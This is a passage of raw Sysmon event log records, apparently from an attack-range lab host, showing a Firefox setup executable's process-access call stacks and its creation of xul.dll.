dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64) 10341000x800000000000000015540Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.599{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000015539Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.599{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64) 10341000x800000000000000015538Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.599{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64) 10341000x800000000000000015537Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.599{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64) 10341000x800000000000000015536Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.599{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000015535Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.599{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64) 11241100x800000000000000015534Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:52.599{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeC:\Program Files\Mozilla Firefox\xul.dll2021-01-18 13:59:52.599 10341000x800000000000000015533Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.583{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015532Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.583{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015531Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.583{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015530Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.583{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015529Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.583{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015528Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.583{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015527Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.583{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000015526Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.583{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015525Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.583{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015524Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.583{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015523Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.583{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015522Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
